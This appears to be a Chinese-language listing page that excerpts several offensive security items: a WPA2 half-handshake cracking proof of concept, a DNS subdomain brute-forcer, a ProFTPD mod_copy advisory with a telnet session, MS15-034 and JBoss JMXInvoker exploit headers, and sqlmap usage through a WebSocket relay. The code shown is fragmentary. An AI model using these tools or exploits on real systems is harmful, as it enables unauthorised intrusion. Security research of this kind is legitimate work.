WPA2半握手包破解,不需要传统完整4步握手也可破解,WiFi密码破解

dxa4481/WPA2-HalfHandshake-Crack This is a POC to show it is possible to capture enough of a handshake with a user from a fake AP to crack a WPA2 network without knowing the passphrase of the actual AP. WPA2-HalfHandshake-Crack Conventional WPA2 attacks work by listening for a handshake between client and Access Point. This full fourway handshake is then used in a dictonary attack. This tool is a Proof of Concept to

DNS Spider Multithreaded Bruteforcer v0.6,DNS子域名暴力猜解

#!/usr/bin/env python2 # ############################################################################# # 我就是那个坏坏小孩 # # 喜欢的人怎么还没有来 # # 想要对你表白,可是自己一直都做不来 # # 我就是那坏坏小孩 # # 坏小孩 # # ........ # ############################################################################### import sys import time import

ProFTPD <=1.3.5 mod_copy 未授权文件复制漏洞 POC

Description TJ Saunders 2015-04-07 16:35:03 UTC Vadim Melihow reported a critical issue with proftpd installations that use the mod_copy module's SITE CPFR/SITE CPTO commands; mod_copy allows these commands to be used by *unauthenticated clients*: --------------------------------- Trying 80.150.216.115... Connected to 80.150.216.115. Escape character is '^]'. 220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:80.150.216.115] site help 214-The following SITE commands are recognized (* =>'s unimplemented) 214-CPFR <sp> pathname 214-CPTO <sp> pathname 214-UTIME <sp> YYYYMMDDhhmm[ss]

MS15-034 IIS 7.0 HTTP.sys 远程代码执行漏洞(CVE-2015-1635) POC

检测脚本一: Python----beebeeto http://www.beebeeto.com/pdb/poc-2015-0081/ #!/usr/bin/env python # coding=utf-8 """ Site: http://www.beebeeto.com/ Framework: https://github.com/n0tr00t/Beebeeto-framework """ import socket import random import urlparse from baseframe import BaseFrame class MyPoc(BaseFrame): poc_info = { # poc相关信息 'poc': { 'id': 'poc-2015-0081', 'name': 'IIS 7.0 HTTP.sys 远程代码执行漏洞(CVE-2015-163

JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution

JBoss JMXInvokerServlet JMXInvoker 0.3 - 远程代码执行 /* * JBoss JMXInvokerServlet Remote Command Execution * JMXInvoker.java v0.3 - Luca Carettoni @_ikki * * This code exploits a common misconfiguration in JBoss Application Server (4.x, 5.x, ...). * Whenever the JMX Invoker is exposed with the default configuration, a malicious "MarshalledInvocation" * serialized Java object allows to execute arbitrary code. This exploit works even if the "Web-Console"

WebSocket 中转注入工具(for SQL Injection tools: sqlmap, etc.)

WebSocket 中转注入工具(for SQL Injection tools: sqlmap, etc.) Ricter (๑`・ᴗ・´๑) | 2015-03-22 23:55 https://github.com/RicterZ/websocket-injection Installation git clone https://github.com/RicterZ/websocket-injection cd websocket-injection pip install -r requirements.txt Usage python main.py --port=8888 python sqlmap.py -u "http://localhost:8888/?url=[target]&data=[sqli]" -p data MIT 各种求 star ~ [原文地址]